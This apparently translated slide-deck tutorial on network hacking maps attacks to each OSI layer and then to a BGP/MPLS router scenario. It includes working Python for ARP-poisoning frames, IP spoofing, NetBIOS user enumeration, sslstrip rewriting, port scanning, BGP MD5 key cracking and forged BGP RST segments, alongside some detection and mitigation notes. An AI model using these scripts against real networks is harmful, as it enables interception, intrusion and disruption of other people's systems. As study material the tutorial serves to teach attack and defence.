PHILOSOPHY
General and fundamental knowledge of the objective of a problem
Network hacking philosophy?
A basic, fundamental understanding of computer networks and of the vulnerabilities in their communication protocols
Let's start to understand our network!
OSI MODEL
The OSI model has 7 layers: physical, data link, network, transport, session, presentation, and application
RELATIONSHIP BETWEEN HACKING AND THE OSI MODEL
The OSI model describes, in general and fundamental terms, how digital communication works
Which technology sits at each layer?
Does this technology exist in your network? Or which technology is used?
For each one: vulnerability, attack vector, impact, and how to exploit it?
OSI : Layer #1 – Physical
Example technologies: IEEE 802.3, IEEE 802.11, IEEE 802.16, SONET/SDH, ADSL
Attack vector: can the attacker reach the Layer #1 technology at all? Physical access?
Impact: mostly Denial of Service.
Example vulnerability: N/A
How to exploit: cutting fibre cables, jamming wireless (802.11/802.16) signals
Not so interesting, but it does happen!
OSI : Layer #2 – Data Link
Example technologies: Layer 2 switches (IEEE 802.3), ARP, ATM, and frame relay.
Attack vector: can the attacker reach the Layer #2 technology? Is the attacker on the Local Area Network?
Impact: loss of confidentiality and integrity, Denial of Service
Example vulnerabilities: the finite size of the switch CAM table, and ARP cache poisoning (ARP has no authentication, so any host can answer for any IP)
How to exploit: CAM table flooding and ARP cache poisoning, aiming at DoS or Man in The Middle; the yersinia L2 attack toolkit
Exploitation at layer #2 is usually combined with other attacks such as sniffing and replay attacks.
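The ARP cache poisoning slide above describes the attack from the attacker's side; the following added example (not from the original deck) shows the same frames from the defender's side. It builds an Ethernet/ARP reply frame byte by byte, parses it back, and runs an arpwatch-style monitor over a constructed two-frame sequence: a genuine reply from the gateway, then a forged reply in which an attacker claims the gateway's IP with its own MAC. All addresses and the frames themselves are made up for the example; nothing is sent on the wire.

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply (what both a real host and a
    poisoner send); padded to the 60-byte minimum frame size."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return (eth + arp).ljust(60, b"\x00")

def parse_arp_frame(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        return None
    _dst, src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "eth_src": mac_str(src), "sha": mac_str(sha),
            "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}

class ArpWatch:
    """Minimal arpwatch-style monitor: learns IP->MAC from replies and flags a
    poisoning attempt when a known IP suddenly claims a different MAC, or when
    the ARP sender MAC does not match the Ethernet source MAC."""
    def __init__(self):
        self.table = {}
        self.alerts = []

    def feed(self, frame):
        arp = parse_arp_frame(frame)
        if arp is None or arp["oper"] != ARP_REPLY:
            return None
        ip, mac = arp["spa"], arp["sha"]
        alert = None
        if arp["eth_src"] != mac:
            alert = f"{ip}: ARP sender MAC {mac} != Ethernet source {arp['eth_src']}"
        elif ip in self.table and self.table[ip] != mac:
            alert = f"{ip}: MAC changed {self.table[ip]} -> {mac} (possible ARP cache poisoning)"
        self.table[ip] = mac   # record the flip-flop so the next change is seen too
        if alert:
            self.alerts.append(alert)
        return alert

# Constructed sample traffic (not a real capture): the gateway answers the
# victim, then an attacker on the same LAN claims the gateway's IP.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:1a:2b:3c:4d:5e"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "08:00:27:aa:bb:cc"
ATTACKER_MAC = "de:ad:be:ef:00:01"
LEGIT_REPLY = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
POISON_REPLY = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)

def demo():
    watch = ArpWatch()
    for frame in (LEGIT_REPLY, POISON_REPLY):
        watch.feed(frame)
    return watch.alerts

if __name__ == "__main__":
    for a in demo():
        print("ALERT:", a)
```

The second frame is accepted by every unprotected host on the segment, which is the whole attack: the victim's cache now points the gateway IP at the attacker's MAC, so its outbound traffic flows through the attacker, who can sniff it or drop it (DoS). The monitor only detects the change; prevention needs Dynamic ARP Inspection or static entries on the switch.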
OSI : Layer #3 – Network
Example technologies: IP, ICMP, IPsec, and routing protocols.
Attack vector: can the attacker reach the Layer #3 technology? Remotely accessible?
Impact: loss of confidentiality and integrity, Denial of Service
Example vulnerabilities: packet spoofing (IP carries no proof of the source address), routing protocol weaknesses, and IPsec weaknesses
How to exploit: IP spoofing, IP fragmentation, ICMP smurfing, BGP man in the middle, BGP NLRI injection, LDP injection on MPLS, GRE traffic tunneling, and the Loki project
Exploitation at layer #3 is usually combined with other attacks such as sniffing
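IP spoofing and IP fragmentation are listed above as Layer #3 techniques (fragmentation reappears later in the deck as an IDS evasion trick). The added example below, which is not part of the original slides, builds IPv4 headers with an arbitrary source address and a correct header checksum, splits a datagram into MTU-sized fragments, and reassembles them with the strict contiguity check an IDS or end host must apply. Addresses, the payload and the MTU are constructed values.

```python
import struct
import ipaddress

def inet_checksum(data):
    """RFC 1071 ones' complement checksum; 0 when run over a header that already carries a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src, dst, proto, payload, ident, frag_offset=0, more_fragments=False, ttl=64):
    """IPv4 header with a spoofable source address; frag_offset is in bytes and must be a multiple of 8."""
    flags_frag = (0x2000 if more_fragments else 0) | ((frag_offset // 8) & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + payload

def fragment(src, dst, proto, payload, ident, mtu=1500):
    """Split one datagram's payload into fragments that fit the MTU (non-final pieces are multiples of 8 bytes)."""
    piece = ((mtu - 20) // 8) * 8
    frags = []
    for off in range(0, len(payload), piece):
        chunk = payload[off:off + piece]
        frags.append(build_ipv4(src, dst, proto, chunk, ident, off, off + piece < len(payload)))
    return frags

def parse_ipv4(pkt):
    ihl = (pkt[0] & 0x0F) * 4
    _vi, _tos, total_len, ident, flags_frag, _ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "ident": ident, "proto": proto,
            "mf": bool(flags_frag & 0x2000), "offset": (flags_frag & 0x1FFF) * 8,
            "checksum_ok": inet_checksum(pkt[:ihl]) == 0, "payload": pkt[ihl:total_len]}

def reassemble(frags):
    """Strict reassembly: fragments must be contiguous and non-overlapping. An IDS that
    is looser than the end host here can be evaded with overlapping or out-of-order fragments."""
    parts = sorted((parse_ipv4(f) for f in frags), key=lambda p: p["offset"])
    if len({(p["src"], p["dst"], p["ident"], p["proto"]) for p in parts}) != 1:
        raise ValueError("fragments belong to different datagrams")
    data = b""
    for p in parts:
        if not p["checksum_ok"]:
            raise ValueError("bad header checksum")
        if p["offset"] != len(data):
            raise ValueError("gap or overlap at offset %d" % p["offset"])
        data += p["payload"]
    if parts[-1]["mf"]:
        raise ValueError("last fragment missing")
    return data

# Constructed sample: a 3000-byte UDP (proto 17) payload from a spoofed source, not a real capture.
SPOOFED_SRC, TARGET = "10.0.0.1", "192.0.2.10"
PAYLOAD = bytes(i % 256 for i in range(3000))
FRAGMENTS = fragment(SPOOFED_SRC, TARGET, 17, PAYLOAD, ident=0x1234, mtu=576)

if __name__ == "__main__":
    for f in FRAGMENTS:
        p = parse_ipv4(f)
        print(p["src"], "->", p["dst"], "offset", p["offset"], "MF", p["mf"], "len", len(p["payload"]))
    print("reassembled ok:", reassemble(FRAGMENTS) == PAYLOAD)
```

Sending these packets for real needs a raw socket (root) and the reply, if any, goes to the spoofed source, which is why spoofing is mostly useful for one-way effects such as floods and smurf amplification rather than for interactive access.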
OSI : Layer #4 – Transport
Example technologies: UDP, TCP, SCTP
Attack vector: can the attacker reach the Layer #4 technology? Remotely accessible?
Impact: loss of confidentiality and integrity, Denial of Service, and gaining access.
Example vulnerabilities: packet spoofing and session hijacking
How to exploit: SYN flooding, UDP flooding, TCP session hijacking, SCTP scanning to find an entry point into the SS7 network (SIGTRAN)
OSI : Layer #5 – Session
Example technologies: NetBIOS, L2TP, PPTP
Attack vector: can the attacker reach the Layer #5 technology? Remotely accessible?
Impact: loss of confidentiality and gaining access.
Example vulnerability: user enumeration
How to exploit: enumerate users over NetBIOS
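User enumeration over NetBIOS, as listed above, works by sending a node status (NBSTAT) query to UDP/137 and reading the name table the host returns: every unique name with the <03> suffix other than the machine's own name is a logged-on user. The added example below (not from the original deck) encodes the wildcard name per RFC 1001, builds the query, parses a response, and picks out the user names. The response it parses is constructed inline to mirror what a Windows host returns; `query_host` sends the real query and is not exercised offline.

```python
import socket
import struct

NBNS_PORT = 137
NBSTAT = 0x0021
WILDCARD = b"*" + b"\x00" * 15   # "*" node status query name
USER_SUFFIX = 0x03               # Messenger service: one per logged-on user (and one for the machine)

def encode_name(raw16):
    """RFC 1001 first-level encoding: each nibble becomes a letter A..P, giving 32 bytes."""
    return bytes(c for b in raw16 for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))

def build_nbstat_request(txid=0x1234):
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = bytes([32]) + encode_name(WILDCARD) + b"\x00" + struct.pack("!HH", NBSTAT, 1)
    return header + question

def _skip_name(data, off):
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer
            return off + 2
        off += 1 + length

def parse_nbstat_response(data):
    """Return ([(name, suffix, is_group)], mac) from a node status response."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a response with answers")
    off = 12
    for _ in range(qd):
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("not an NBSTAT record")
    count = data[off]
    off += 1
    names = []
    for _ in range(count):
        raw, suffix = data[off:off + 15], data[off + 15]
        nflags = struct.unpack("!H", data[off + 16:off + 18])[0]
        names.append((raw.rstrip(b" \x00").decode("ascii", "replace"), suffix, bool(nflags & 0x8000)))
        off += 18
    return names, data[off:off + 6]

def enumerate_users(names):
    """Unique <03> names other than the machine's own <00> name are logged-on user names."""
    machine = {n for n, suffix, group in names if suffix == 0x00 and not group}
    return sorted({n for n, suffix, group in names
                   if suffix == USER_SUFFIX and not group and n not in machine})

def query_host(host, timeout=2.0):
    """Send the request over UDP/137 and parse the reply (live use; not exercised offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_request(), (host, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    return parse_nbstat_response(data)

def build_nbstat_response(txid, entries, mac):
    """Constructed reply used as offline sample data (same layout a Windows host returns)."""
    rdata = bytes([len(entries)])
    for name, suffix, group in entries:
        rdata += name.upper().encode("ascii").ljust(15) + bytes([suffix]) + struct.pack("!H", 0x8400 if group else 0x0400)
    rdata += mac + b"\x00" * 40   # unit ID (MAC) followed by the statistics block
    answer = bytes([32]) + encode_name(WILDCARD) + b"\x00" + struct.pack("!HHIH", NBSTAT, 1, 0, len(rdata))
    return struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0) + answer + rdata

SAMPLE_MAC = bytes.fromhex("001122334455")
SAMPLE_RESPONSE = build_nbstat_response(0x1234, [
    ("CORP-PC", 0x00, False), ("CORP-PC", 0x03, False), ("WORKGROUP", 0x00, True),
    ("JSMITH", 0x03, False), ("WORKGROUP", 0x1E, True)], SAMPLE_MAC)

if __name__ == "__main__":
    names, mac = parse_nbstat_response(SAMPLE_RESPONSE)
    print("users:", enumerate_users(names), "mac:", mac.hex(":"))
```

The query needs no authentication, which is the vulnerability: a single UDP datagram yields the computer name, workgroup, logged-on users and the MAC address. Blocking UDP/137 at the perimeter is what stops it remotely.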
OSI : Layer #6 – Presentation
Example technologies: SSL, TLS
Attack vector: can the attacker reach the Layer #6 technology? Remotely accessible?
Impact: loss of confidentiality and integrity, and gaining access.
Example vulnerability: SSL Man in The Middle
How to exploit: SSL Man in The Middle with dsniff or sslstrip
Exploitation at layer #6 is usually combined with other attacks such as sniffing
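The sslstrip technique named above does not break TLS; it keeps the victim from ever starting it, by relaying the site over plain HTTP and rewriting every https:// reference in the pages it passes through. The added example below (not from the original deck, and not sslstrip's own code) implements that rewrite and a minimal browser model with an HSTS cache, to show both why the attack works on a first visit and why a cached Strict-Transport-Security policy defeats it. The page content and host names are constructed.

```python
import re
from urllib.parse import urlsplit

_HTTPS = re.compile(r"https://", re.IGNORECASE)

def sslstrip_rewrite(body):
    """What an sslstrip-style proxy does to a response it relays over plain HTTP:
    every https:// reference becomes http://, so the victim's browser keeps
    talking cleartext to the proxy while the proxy speaks TLS to the real site."""
    return _HTTPS.sub("http://", body)

class Browser:
    """Just enough of a user agent to show why HSTS breaks the stripping attack."""
    def __init__(self):
        self.hsts = {}  # host -> includeSubDomains flag

    def remember_hsts(self, host, header_value):
        """Process a Strict-Transport-Security header that arrived over HTTPS."""
        directives = [d.strip().lower() for d in header_value.split(";")]
        max_age = 0
        for d in directives:
            if d.startswith("max-age="):
                max_age = int(d.split("=", 1)[1])
        if max_age > 0:
            self.hsts[host] = "includesubdomains" in directives
        else:
            self.hsts.pop(host, None)   # max-age=0 clears the policy

    def effective_url(self, url):
        """URL actually requested: http:// is upgraded before any packet leaves if HSTS applies."""
        parts = urlsplit(url)
        if parts.scheme != "http":
            return url
        host = (parts.hostname or "").lower()
        for known, subdomains in self.hsts.items():
            if host == known or (subdomains and host.endswith("." + known)):
                return "https://" + url[len("http://"):]
        return url

# Constructed sample page as served by the bank over TLS; the MITM relays it to the victim over HTTP.
ORIGINAL_PAGE = '<a href="https://bank.example/login">Log in</a> <img src="https://cdn.bank.example/logo.png">'

def attack_outcome(browser, page=ORIGINAL_PAGE):
    """Per stripped link: 'http' means the MITM sees the request, 'https' means the browser upgraded it."""
    stripped = sslstrip_rewrite(page)
    links = re.findall(r'(?:href|src)="([^"]+)"', stripped)
    return {link: urlsplit(browser.effective_url(link)).scheme for link in links}

if __name__ == "__main__":
    fresh = Browser()
    print("first visit, no HSTS yet :", attack_outcome(fresh))
    fresh.remember_hsts("bank.example", "max-age=31536000; includeSubDomains")
    print("after a clean visit      :", attack_outcome(fresh))
```

The weak point is the first, unprotected visit (or a user who types the bare host name); HSTS preloading closes that gap for sites on the browser's built-in list.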
OSI : Layer #7 – Application
Example technologies: HTTP, SMTP, DNS, SSH, FTP
Attack vector: can the attacker reach the Layer #7 technology? Remotely accessible?
Impact: loss of confidentiality and integrity, Denial of Service, and gaining access.
Example vulnerabilities: buffer overflow, format string, web application vulnerabilities.
How to exploit: exploiting a buffer overflow or format string bug to gain access or to deny service; exploiting a web application to gain access
KNOWING YOURSELF
At which layers do you have access? Layer 1, 2, 3, 4, 5, 6, 7, or all of them?
The closer you are to the lowest layer, the better your chance of winning the war
KNOWING YOUR ENEMY
Reconnaissance: gather as much information as possible about the enemy
Scanning: find out which hosts are alive and which services are running
The more information you have about your enemy, the better your chance of winning the war
THINGS TO REMEMBER
Vulnerabilities in the transport layer and below ("transport set"):
Easy to prevent (firewall, ACL)
Hard to fix (update, patch)
Vulnerabilities in the application layer ("application set"):
Hard to prevent (firewall, ACL)
Easy to fix (update, patch)
THINGS TO REMEMBER
Stay anonymous and stealthy; don't be rough!
Man in the middle at Layer #2: ARP cache poisoning or CAM table flooding? (flooding is far noisier)
Exploiting a remote buffer overflow at Layer #7: evading IDS/IPS/IDP
Polymorphic or encoded shellcode, or IP fragmentation?
AN EXAMPLE
Routers A, B, C, and D run BGP and SSH, and both services can be reached from the attacker's laptop and from the admin's laptop
The attacker has no connection to the admin's laptop and is on a different network from routers A, B, C, and D
KNOWING YOUR ENEMY
The attacker (you) wants to compromise the MPLS VPN network
He can't attack the administrator's computer directly
After host enumeration, he knows there are four routers on the network
After service scanning, he knows all routers run SSH and BGP
After vulnerability scanning, he knows some routers have vulnerabilities
The attacker searches the web for everything related to the administrator: email addresses and much more
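The host enumeration and service scanning steps above (and the KNOWING YOUR ENEMY slide before them) are the same operation at different granularity: attempt a TCP connection to each port of interest on each candidate host and record which ones answer. The added example below (not from the original deck) is a small full-connect scanner that reports, per host, which of the scenario's two ports (SSH/22 and BGP/179) are open. Because it cannot reach the routers in the example, it also starts a local listener that stands in for a router service so the code can be exercised offline; that listener and the port numbers it picks are constructed for the example.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

SSH_PORT, BGP_PORT = 22, 179   # the two services the scenario's routers expose

def tcp_connect(host, port, timeout=1.0):
    """Full-connect probe: True only if the three-way handshake completed.
    Noisy (the service logs the connection) but needs no raw-socket privileges."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:   # ECONNREFUSED, timeout, host unreachable
        return False

def scan_host(host, ports, timeout=1.0, workers=16):
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_connect(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)

def scan_network(hosts, ports=(SSH_PORT, BGP_PORT), timeout=1.0):
    """Host discovery plus service scan in one pass: a host counts as alive only if some port answered."""
    report = {h: scan_host(h, ports, timeout) for h in hosts}
    return {h: p for h, p in report.items() if p}

def start_fake_service():
    """Local listener standing in for a router service so the scan runs offline (constructed for this example)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:   # listener closed
                return
            conn.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]

def unused_port():
    """A port nothing listens on (bound then released) so a 'closed' result can be shown."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    srv, open_port = start_fake_service()
    print(scan_network(["127.0.0.1"], ports=(open_port, unused_port())))
    srv.close()
```

Against the example's routers you would call `scan_network(["<router A>", "<router B>", "<router C>", "<router D>"])` with the default ports; a full handshake on 179 will show up in the routers' logs, so a stealthier SYN (half-open) scan with nmap or a raw socket is what the "don't be rough" advice points at.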
KNOWING YOURSELF
Do you have access to layer #1? No
Do you have access to layer #2? No
Do you have access to layer #3? Yes, useful for exploitation
Do you have access to layer #4? Yes, useful for exploitation
Do you have access to layer #5? Yes, but not applicable here
Do you have access to layer #6? Yes, but not applicable here
Do you have access to layer #7? Yes, useful for exploitation
SO WHAT??
LAYER #3 ATTACK
Border Gateway (BGP) attack?
BGP Man In The Middle
BGP NLRI injection to reroute traffic
BGP MD5 crack, if applicable (the TCP MD5 signature option, RFC 2385)
MPLS attack?
LDP injection to rewrite labels
ICMP?
ICMP flooding and denial of service
These will be really useful once one router has been compromised!
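"BGP MD5 crack" above refers to the TCP MD5 signature option (RFC 2385) that BGP peers use to authenticate each segment: the digest covers the TCP pseudo-header, the fixed TCP header with a zeroed checksum, the payload and a shared key. Because every signed segment the attacker can sniff is a hash of known data plus the key, the key can be attacked offline. The added example below (not from the original deck) computes the RFC 2385 digest, extracts the option from a segment, and runs a dictionary attack against a constructed signed BGP KEEPALIVE between routers A and B. The addresses, ports, key and wordlist are all made up for the example.

```python
import hashlib
import ipaddress
import struct

TCP_OPT_MD5 = 19
TCP_PROTO = 6

def tcp_md5_digest(src_ip, dst_ip, tcp_segment, key):
    """RFC 2385 signature: MD5 over the TCP pseudo-header, the fixed 20-byte TCP
    header with its checksum zeroed (options excluded), the segment data, and the key."""
    pseudo = (ipaddress.IPv4Address(src_ip).packed + ipaddress.IPv4Address(dst_ip).packed
              + struct.pack("!BBH", 0, TCP_PROTO, len(tcp_segment)))
    data_offset = (tcp_segment[12] >> 4) * 4
    fixed_header = tcp_segment[:16] + b"\x00\x00" + tcp_segment[18:20]
    return hashlib.md5(pseudo + fixed_header + tcp_segment[data_offset:] + key).digest()

def extract_md5_option(tcp_segment):
    """Return the 16-byte signature carried in option kind 19, or None."""
    data_offset = (tcp_segment[12] >> 4) * 4
    opts, i = tcp_segment[20:data_offset], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:      # end of options
            break
        if kind == 1:      # NOP
            i += 1
            continue
        length = opts[i + 1]
        if kind == TCP_OPT_MD5 and length == 18:
            return opts[i + 2:i + 18]
        i += length
    return None

def crack_md5_key(src_ip, dst_ip, tcp_segment, wordlist):
    """Offline dictionary attack: recompute the signature under each candidate key
    and compare with the one observed on the wire. Nothing is sent to the routers."""
    observed = extract_md5_option(tcp_segment)
    if observed is None:
        return None
    for candidate in wordlist:
        if tcp_md5_digest(src_ip, dst_ip, tcp_segment, candidate) == observed:
            return candidate
    return None

def sign_segment(src_ip, dst_ip, fixed_header, data, key):
    """Append a signed MD5 option the way a BGP speaker does (used here only to build sample data)."""
    hdr = bytearray(fixed_header)
    hdr[12] = (10 << 4) | (hdr[12] & 0x0F)   # data offset: 20-byte header + 20 bytes of options
    option = bytes([TCP_OPT_MD5, 18]) + b"\x00" * 16 + b"\x01\x01"   # placeholder digest + 2 NOPs
    digest = tcp_md5_digest(src_ip, dst_ip, bytes(hdr) + option + data, key)
    return bytes(hdr) + bytes([TCP_OPT_MD5, 18]) + digest + b"\x01\x01" + data

# Constructed sample (not a real capture): a BGP KEEPALIVE from router A (192.0.2.1) to
# router B (192.0.2.2), signed with a weak shared key.
ROUTER_A, ROUTER_B = "192.0.2.1", "192.0.2.2"
BGP_KEEPALIVE = b"\xff" * 16 + struct.pack("!HB", 19, 4)   # marker, length 19, type 4
FIXED_HEADER = struct.pack("!HHIIBBHHH", 179, 50123, 0x11223344, 0x55667788, 5 << 4, 0x18, 16384, 0, 0)
SHARED_KEY = b"Secr3tPeer"
CAPTURED_SEGMENT = sign_segment(ROUTER_A, ROUTER_B, FIXED_HEADER, BGP_KEEPALIVE, SHARED_KEY)
WORDLIST = [b"cisco", b"bgp123", b"juniper", b"Secr3tPeer", b"password"]

if __name__ == "__main__":
    print("signature:", extract_md5_option(CAPTURED_SEGMENT).hex())
    print("recovered key:", crack_md5_key(ROUTER_A, ROUTER_B, CAPTURED_SEGMENT, WORDLIST))
```

Once the key is known, the attacker can sign its own segments in both directions, which is what turns BGP NLRI injection and RST-based session teardown from blind attacks into straightforward ones. The defence is a long random key (and TCP-AO where supported); MD5 itself is not the weak point, the guessable key is.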
LAYER #4 ATTACK
TCP?
SYN flooding of the SSH and BGP ports, causing denial of service
TCP FIN/RST to tear down an Established BGP session
UDP and the other layer #4 protocols are not applicable here
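Tearing down a BGP session with a forged RST, as proposed above, needs three things: a spoofed source (the peer's address and port), a correct TCP checksum over the pseudo-header, and a sequence number the victim will accept. The added example below (not from the original deck) builds such a segment and models the receiver's decision under classic TCP (any in-window sequence number is accepted) and under RFC 5961 (only the exact expected number; an in-window guess gets a challenge ACK instead), which is what decides whether the attack is feasible blind or only with a sniffed session. The addresses, ports and window values are constructed.

```python
import ipaddress
import math
import struct

FLAG_RST, FLAG_ACK = 0x04, 0x10
BGP_PORT = 179

def inet_checksum(data):
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def _pseudo(src_ip, dst_ip, length):
    return (ipaddress.IPv4Address(src_ip).packed + ipaddress.IPv4Address(dst_ip).packed
            + struct.pack("!BBH", 0, 6, length))

def build_tcp_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window=0, payload=b""):
    """Raw TCP segment (no options) with a correct checksum; src_ip is whatever the attacker spoofs."""
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    segment = header + payload
    csum = inet_checksum(_pseudo(src_ip, dst_ip, len(segment)) + segment)
    return segment[:16] + struct.pack("!H", csum) + segment[18:]

def tcp_checksum_ok(src_ip, dst_ip, segment):
    return inet_checksum(_pseudo(src_ip, dst_ip, len(segment)) + segment) == 0

def forge_bgp_rst(peer_ip, victim_ip, peer_port, seq):
    """RST that pretends to come from the BGP peer (its ephemeral port -> victim's 179);
    seq must be the sequence number the victim expects next from that peer."""
    return build_tcp_segment(peer_ip, victim_ip, peer_port, BGP_PORT, seq, 0, FLAG_RST)

def rst_disposition(rst_seq, rcv_nxt, rcv_wnd, rfc5961=True):
    """How the receiver treats a RST: classic TCP accepts anything in the receive window;
    RFC 5961 accepts only an exact match and answers an in-window guess with a challenge ACK."""
    distance = (rst_seq - rcv_nxt) & 0xFFFFFFFF   # modular, so sequence-number wrap is handled
    if distance >= rcv_wnd:
        return "drop"
    if distance == 0 or not rfc5961:
        return "accept"
    return "challenge-ack"

def blind_guesses_needed(rcv_wnd, rfc5961=True):
    """Worst-case RSTs a blind attacker (no sniffing) must send to hit an acceptable sequence number."""
    return (1 << 32) if rfc5961 else math.ceil((1 << 32) / rcv_wnd)

# Constructed scenario (not a capture): router B's BGP session with router A, as seen by B.
ROUTER_A, ROUTER_B = "192.0.2.1", "192.0.2.2"
A_PORT = 50123               # A's ephemeral port; B listens on 179
B_RCV_NXT, B_RCV_WND = 0x20000000, 16384

if __name__ == "__main__":
    rst = forge_bgp_rst(ROUTER_A, ROUTER_B, A_PORT, B_RCV_NXT)
    print("checksum valid as if from A:", tcp_checksum_ok(ROUTER_A, ROUTER_B, rst))
    print("exact seq :", rst_disposition(B_RCV_NXT, B_RCV_NXT, B_RCV_WND))
    print("in-window :", rst_disposition(B_RCV_NXT + 100, B_RCV_NXT, B_RCV_WND))
    print("blind guesses without RFC 5961:", blind_guesses_needed(B_RCV_WND, rfc5961=False))
```

With a 16 KiB window and no RFC 5961, about 262,144 spoofed RSTs cover the whole sequence space, which is a few seconds of traffic; with RFC 5961 (or the TCP MD5 option from the previous slide, which the forged segment would fail), the attacker must sniff the session to learn the exact sequence number, i.e. needs the Layer #2 or #3 position the deck asked about under KNOWING YOURSELF.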
LAYER #7 ATTACK
Exploiting router vulnerabilities to gain access
Buffer overflow?
Format string?
Denial of service?
Guessing router usernames and passwords to gain access
Ncrack?
THC-Hydra?
YES! You can use social engineering, but that is a different topic from hacking the network!